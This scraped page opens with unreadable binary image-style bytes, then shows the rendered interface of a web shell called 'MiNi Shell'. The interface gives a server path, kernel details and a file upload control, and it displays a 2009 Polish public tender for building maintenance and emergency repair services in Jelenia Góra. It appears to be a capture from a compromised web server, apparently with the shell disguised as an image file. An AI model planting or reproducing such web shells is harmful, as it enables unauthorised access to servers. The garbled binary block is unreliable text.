JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090114/15791-N-2009.html

<p class="kh_header"><b>Jelenia Góra: Wykonywanie konserwacji i napraw bieżących w branży budowlanej oraz świadczenia czynności pogotowia technicznego w budynkach mieszkalnych i użytkowych administrowanych przez ZGL Południe w Jeleniej Górze</b><br>
<b>Numer ogłoszenia: 15791 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Lokalowej "Południe" w Jeleniej Górze , Plac Piastowski 2A, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 075 6428200, faks 075 6428201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgl.jga.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie konserwacji i napraw bieżących w branży budowlanej oraz świadczenia czynności pogotowia technicznego w budynkach mieszkalnych i użytkowych administrowanych przez ZGL Południe w Jeleniej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> WYKONYWANIE KONSERWACJI I NAPRAW BIEŻĄCYCH W BRANŻY BUDOWLANEJ ORAZ  ŚWIADCZENIE  CZYNNOŚCI POGOTOWIA TECHNICZNEGO w budynkach mieszkalnych i użytkowych administrowanych przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze.

Wspólny Słownik Zamówień CPV: 71 31 50 00-9;  50 70 00 00-2;  45 00 00 00-7;
                                                          45 23 32 29 -0;  45 26 19 00 -3;  45 45 00 00- 6

ZAKRES RZECZOWY ROBÓT:

     W zakresie objętym przedmiotem zamówienia znajdują się  roboty:
-	murarskie, 
-	malarskie, 
-	stolarskie, 
-	szklarskie, 
-	dekarskie
-	 i inne 
wykonywane w celu zabezpieczenia stanu technicznego i estetycznego budynków, zapewniającego bezpieczeństwo ludzi i mienia, mające charakter utrzymaniowy.
Roboty te polegać będą na stałej obsłudze technicznej budynków, ich lokali mieszkalnych i użytkowych,  wykonywane w celu konserwacji, napraw bieżących i usuwania awarii.  

1) Konserwacje i naprawy bieżące w budynkach mieszkalnych i użytkowych administrowanych przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze a dotyczących części wspólnych budynków (klatki schodowe, korytarze piwniczne, strychy, wózkarnie, suszarnie, pralnie, oraz pomieszczenia schronowe) obejmują roboty w zakresie pokryć dachowych, elewacji budynków, stolarki okiennej i drzwiowej, przewodów dymowych, spalinowych i wentylacyjnych np:
.	miejscową likwidację  przecieków  wody  poprzez  przecięcie  pęcherzy  oraz  wstawienie  łat  na powierzchni dachu,
.	uszczelnienie pokrycia dachowego,
.	czyszczenie i udrożnienie rynien i rur spustowych,
.	konieczną wymianę rynien, rur spustowych i obróbek blacharskich,
.	naprawę poprzez prostowanie, mocowanie i lutowanie drobnych uszkodzeń obróbek blacharskich, daszków, pasów nadrynnowych i podrynnowych, parapetów, rynien, rur spustowych itp. łącznie z zabezpieczeniem antykorozyjnym,
.	uzupełnienie i uszczelnienie pokrycia dachówką oraz gąsiorów,
.	reperację, wymianę włazów dachowych, elementów drabin, klamer włazowych, ław kominiarskich itp,
.	miejscową reperację odparzonego tynku bez względu na rodzaj podłoża,
.	uzupełnienie ubytków tynku (podłoża) wraz z przetarciem nowego tynku,
.	usunięcie drobnych uszkodzeń w elementach elewacji budynku (gzymsy, elementy balkonowe, loggie, zadaszenia, murki oporowe),
.	naprawa płyt balkonowych (np. naprawa tynków, odwodnienia, izolacji)
.	naprawa ściany na klatce schodowej,
.	naprawa ściany z ewentualnym odgrzybieniem i dociepleniem na klatce schodowej przy drzwiach wejściowych i w okolicach strychu,
.	zabezpieczenie uszkodzonych stropów przez podparcie do czasu remontu,
.	dopasowanie stolarki okiennej i drzwiowej oraz regulacja baskwili, zamków, itp. w pomieszczeniach wspólnego użytkowania oraz szklenie, wymiana zamków i samozamykaczy,
.	awaryjna wymiana okien,
.	 drobne naprawy drzwi wejściowych i wiatrołapów,
.	naprawę uszkodzeń posadzek, podłóg i schodów (np. poręczy, tralek słupów schodowych, stopni i podstopni) w pomieszczeniach wspólnego użytkowania, 
.	odnowienie (malowanie) pomieszczeń wspólnego użytkowania, 
.	drobną reperację czap kominowych,
.	 przemurowanie główek kominowych,
.	uzupełnienie spoinowania zewnętrznego komina względnie uzupełnienie lub wymiana tynku na kominie,
.	przemurowanie pęknięć komina,
.	wymianę i osadzenie wyczystek,
.	uzupełnienie kratek wentylacyjnych,
.	wykonanie przełączeń wg wskazań opinii kominiarskich,
.	zabezpieczenie lokali mieszkalnych po wykwaterowaniu
.	zabezpieczenie lokali użytkowych - pustostanów
.	zabezpieczenie budynków wyłączonych z użytkowania.
a) Szczegółowy zakres rzeczowy robót w lokalach mieszkalnych stanowiących własność Gminy,
     którego realizacja będzie uzależniona od środków finansowych posiadanych przez zamawiającego
     obejmuje: 
.	wymianę stolarki okiennej i drzwiowej,
.	wymianę podłóg, posadzek i wykładzin podłogowych,
.	wymianę tynków oraz roboty odgrzybieniowe,

2) Wykonawca zabezpiecza dyżury w ramach pogotowia technicznego w celu przyjmowania  zgłoszeń na wypadek awarii oraz innych zdarzeń losowych, ich usuwania i wykonywania wszelkich prac zabezpieczających, w dni robocze od godziny 15:00do 7:00 dnia następnego, oraz w dni wolne od pracy tj. w soboty niedziele i święta od godziny 7:00do 7:00 dnia następnego.
- Wykonawca zobowiązany jest do podania numeru  telefonu kontaktowego, pod którym Zamawiający  będzie mógł  zostawić  wiadomość  w  przypadku   wystąpienia  awarii.
- W zakresie objętym przedmiotem zamówienia Wykonawca zobowiązany jest do skutecznego usuwania awarii oraz zabezpieczenia jej skutków, w czasie nie dłuższym niż 1 godzina od chwili zgłoszenia.
- Wykonawca podejmuje wszelkie działania niezbędne do likwidacji awarii i niezwłocznego przystąpienia do jej usunięcia lub zabezpieczenia miejsca awarii polegającego na niedopuszczeniu do powstania dalszych szkód oraz wyeliminowanie zagrożenia zdrowia i życia i mienia, np. poprzez wygrodzenie terenu taśmą i tablicami ostrzegawczymi, zbiciu wiszącego tynku, demontażu obróbki blacharskiej, przykryciu plandeką dachu itp. czynności oraz uprzątnięciu terenu z gruzu.
- O zaistniałej awarii lub innym zdarzeniu losowym, Wykonawca informuje niezwłocznie Zamawiającego i w oparciu o sporządzony, przy wspólnym udziale protokół oraz składniki cenotwórcze wynikające z oferty, sporządzi kosztorys powykonawczy na wykonane roboty.
- Za czynności związane z awariami wykonywane po godzinie 15:00 oraz w dni wolne od pracy Wykonawca w kosztorysie powykonawczym zastosuje współczynnik zwiększający r-g netto o 30%.

ZASADY WSPÓŁPRACY   POMIĘDZY  ZAMAWIAJĄCYM  I  WYKONAWCĄ:

Szczegółowy zakres robót do wykonania zostanie ustalony przez Techników poszczególnych
Rejonów (ROM-1 i ROM-2)  w działach technicznych pionu komunalnego i pionu wspólnot mieszkaniowych, w oparciu o dokonane przeglądy i oględziny stanu technicznego obiektów oraz bieżące zgłoszenia.
- Na  wykonanie  poszczególnych  robót  Wykonawca  otrzyma  odrębne zlecenie podpisane
przez Technika właściwego terytorialnie danego ROM-u,  zatwierdzone przez Dyrektora lub Jego Zastępcę, określające:
-     Imię, nazwisko i adres osoby zgłaszającej,
-     adres budynku, Nr NIP w przypadku Wspólnoty Mieszkaniowej,
      -     numer lokalu,
-	wartość szacunkową robót,
-	szczegółowy zakres robót do wykonania,
-	termin wykonania robót,
-	gwarancję (wymagana lub nie)
     Wzór zlecenia stanowić będzie załącznik do umowy. 
    Odbiór zlecenia wykonawca potwierdzi podpisem.
- Zlecenie zostanie wystawione w trzech egzemplarzach:
- dla Wykonawcy,
- dla Technika na danym ROM -ie,
- dla GK lub WK wm.
- Wykonawca  zobowiązany jest utrzymywać w sposób ciągły i bezpośredni  kontakt z Technikami ROM-u (odpowiednio do części zamówienia), tj.:
- ROM - 1   Jelenia Góra ul. Wolności 39 of  - dział techniczny pionu komunalnego i pionu 							                          wspólnot mieszkaniowych
- ROM - 2    Jelenia Góra Plac Piastowski 2a - dział techniczny pionu komunalnego i pionu 							                          wspólnot mieszkaniowych
 poprzez codzienne zgłaszanie się do godz.900 w siedzibie ROM-u celem odebrania zleceń.
- Nie stawienie się Wykonawcy przez kolejne dwa dni robocze pociągnie za sobą skutki prawne i finansowe określone w Istotnych postanowieniach umowy stanowiącym załącznik  do siwz , do rozwiązania umowy włącznie.
- Normy zastosowane w kosztorysach powykonawczych winny być oparte na normach ujętych w katalogach KNR, KSNR, KNNR, KNP oraz przyjętych przez strony normach zakładowych w przypadku, gdy nie są ujęte ww. katalogach .
- Wykonawca przejmuje pełną odpowiedzialność materialną za szkody powstałe z winy wykonawcy w czasie świadczenia robót na rzecz Zamawiającego.
- Wszystkie roboty remontowe ujęte w przedmiocie zamówienia należy wykonać z materiałów własnych. Nie przewiduje się udzielania zaliczek na poczet wykonywanych robót.
- Wykonawca będzie wykonywał roboty z materiałów własnych i we własnym zakresie na zasadach określonych w ofercie i umowie.
- Wykonawca zobowiązany jest do wykonania zleconych robót niezwłocznie po otrzymaniu zlecenia.
- Wykonawca zobowiązany jest do rozliczania zleconych konserwacji i drobnych remontów oraz usuniętych awarii, z podziałem na poszczególne nieruchomości, w okresach miesięcznych, w terminie do 5-go dnia następnego miesiąca.
- Rozliczenie robót będących przedmiotem zamówienia należy dokonywać kosztorysami powykonawczymi na bazie składników cenotwórczych wynikających z oferty.
- Ceny materiałów użytych do realizacji robót będą rozliczane wg faktur z hurtowni lub producenta, 
       jednakże w wysokości nie wyższej niż średnie ceny publikowane w wydawnictwie Sekocenbud z 
       okresu realizacji robót a w przypadku braku faktur materiały rozliczane będą wg cen minimalnych
       publikowanych w wydawnictwie Sekocenbud z okresu realizacji robót (do cen materiałów należy
       doliczyć koszty zakupu i transportu materiałów wg wskaźnika procentowego określonego w ofercie.)
- ceny pracy sprzętu będą rozliczane wg cen ich wynajmu, jednakże w wysokości nie wyższej niż średnie     
     ceny pracy sprzętu publikowane w wydawnictwie Sekocenbud z okresu realizacji robót.

Zamawiający zleca wykonanie robót do wysokości posiadanych środków finansowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.31.50.00-9, 50.70.00.00-2, 45.00.00.00-7, 45.23.32.29-0, 45.26.19.00-3, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona  wadium w wysokości 2.000,00 zł dla każdej części zamówienia. Wadium należy wnieść przed terminem składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
nakładają obowiązek posiadania takich uprawnień.
2)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia. lub przedstawią pisemne zobowiązanie innych podmiotów 
      do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
      3)   Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)   Nie podlegaj ą wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. l i 2 ustawy 
       Prawo zamówień publicznych.
      5)  udzielić co najmniej 12 miesięcznej rękojmi,
      6)  przy wykonywaniu przedmiotu zamówienia stosować wyroby budowlane wprowadzone do
           obrotu zgodnie z przepisami odrębnymi (art. 10 ustawy z dnia 7 lipca 1994 r. prawo budowlane,
            tekst jednolity Dz. U. z 2006 r. Nr 156 póz. 1118 z późn. zm.). Dokumenty potwierdzające
          wprowadzenie do obrotu należy przedstawić do wglądu w trakcie realizacji, a komplet
          przekazać przed odbiorem końcowym..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:
1)	Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa
w art. 22 ust. l pkt 1-4 ustawy Prawo zamówień publicznych - o treści zgodnej ze wzorem
stanowiącym załącznik nr 2 do SIWZ.
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia
do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert.
3)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej
Polskiej składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub
miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono
upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 3 zastępuje się je
dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem
sądowym, administracyjnym albo organem samorządu zawodowego  lub gospodarczego
odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania.

     W przypadku  składania  oferty przez  wykonawców  występujących  wspólnie,   wyżej  wymienione 
     dokumenty muszą być złożone przez każdego wykonawcę.
Wykaz innych dokumentów i oświadczeń wymaganych przez zamawiającego:

1)	Formularz oferty sporządzony zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ.
      2)   Formularz - Doświadczenie zawodowe - załącznik nr 3 do SIWZ   
             - wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia 	postępowania o  udzielenie zamówienia,  a jeżeli okres  prowadzenia   działalności jest krótszy - w tym 
             okresie, odpowiadających  swoim rodzajem i wartością robotom budowlanym stanowiącym   przedmiot
             zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem
             dokumentów potwierdzających, że roboty te zostały  wykonane należycie.
            Wykaz musi zawierać minimum 3 roboty polegające na wykonywaniu drobnych robót
              ogólnobudowlanych w budynkach poparte dokumentem potwierdzającym, że roboty te zostały
               wykonane należycie.
               LUB
              wykazu wykonanych usług budowlanych, a w przypadku świadczeń okresowych lub ciągłych   również
             wykonywanych  usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie
             zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim
              rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat
             wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie.
              Wykaz    musi    zawierać    minimum    3    usługi    polegające    na    wykonywaniu    usług
               ogólnobudowlanych konserwacyjnych w budynkach poparte dokumentem potwierdzającym, że
               usługi te zostały wykonane należycie.
              Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.       
        3)   Formularz -Potencjał kadrowy - załącznik nr 4 do SIWZ.  
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
                Wymagane jest wykazanie:
-	l osoby zatrudnionej na stanowisku kierowniczym posiadającej uprawnienia budowlane
wykonawcze w zakresie specjalności konstrukcyjno - budowlanej i przynależącej do Izby
Inżynierów Budownictwa. Do oferty należy dołączyć kopię uprawnień oraz zaświadczenie o
przynależności do Izby Inżynierów Budownictwa,
          - 4 osoby do wykonania zleconych robót w branży budowlanej. 
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.         
4)  Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik lub gdy Wykonawcy wspólnie
      ubiegają się o udzielenie zamówienia.
5) Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od
    odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej 100.000,00 zł.
         W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę.
Oferta wspólna.
1.	Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej wykonawców (w
ramach  oferty wspólnej  w  rozumieniu  art.  23  ustawy Prawo  zamówień  publicznych  pod
warunkiem, że taka oferta spełniać będzie następujące wymagania:
1)	Wykonawcy  występujący  wspólnie   są zobowiązani   do   ustanowienia  Pełnomocnika  do
reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia
umowy w sprawie przedmiotowego zamówienia publicznego;
2)	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza
powinien być załączony do oferty i zawierać w szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich    wykonawców    ubiegających    się    wspólnie    o    udzielenie    zamówienia
wymienionych z nazwy z określeniem adresu siedziby;
c)	ustanowionego Pełnomocnika oraz zakres jego umocowania;
2.	Dokument pełnomocnictwa musi być podpisany przez wszystkich wykonawców ubiegających się
wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do
składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji wykonawców.
3.	Stosowne odpisy (dla wszystkich wykonawców) z rejestru lub ewidencji (część 5 ust. 2 SIWZ)
muszą zostać dołączone do oferty;
4.	W odniesieniu do warunków określonych w art. 22 ust. l pkt 2 i 3 ustawy Prawo zamówień
publicznych wymagania te muszą być spełnione wspólnie przez wykonawców składających ofertę
wspólną (nie musi ich spełniać każdy z wykonawców składających ofertę wspólną osobno);
5.	Oświadczenia, formularze, dokumenty sporządzone na załączonych do SIWZ wzorach, składa i
podpisuje w imieniu wszystkich wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym
na podanie nazwy i adresu wykonawcy, nazwy i adresy wszystkich wykonawców składających
ofertę wspólną;
6.	Wszystkie kserokopie dokumentów załączone do oferty muszą być opisane za zgodność z
oryginałem i podpisane przez Pełnomocnika;
7.	Wszelka korespondencja prowadzona będzie przez zamawiającego wyłącznie z Pełnomocnikiem,
którego adres należy wpisać w formularzu oferty.
8.	Jeżeli oferta wykonawców występujących wspólnie zostanie wybrana, zamawiający zażąda przed
zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych
wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - wskaźnik % kosztów zakupu i transportu materiałów - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgl.jga.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2009 godzina 09:00, miejsce: Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - budynki ROM-1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie konserwacji i napraw bieżących w branży budowlanej oraz świadczenia czynności pogotowia technicznego w budynkach mieszkalnych i użytkowych administrowanych przez ZGL Południe w Jeleniej Górze.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.50.00-9, 50.70.00.00-2, 45.00.00.00-7, 45.23.32.29-0, 45.26.19.00-3, 45.45.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. wskaźnik % kosztów zakupu i transpotu materiałów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - budynki ROM-2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie konserwacji i napraw bieżących w branży budowlanej oraz świadczenia czynności pogotowia technicznego w budynkach mieszkalnych i użytkowych administrowanych przez ZGL Południe w Jeleniej Górze.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.50.00-9, 50.70.00.00-2, 45.00.00.00-7, 45.23.32.29-0, 45.26.19.00-3, 45.45.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. wskaźnik % kosztów zakupu i transportu materiałów - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com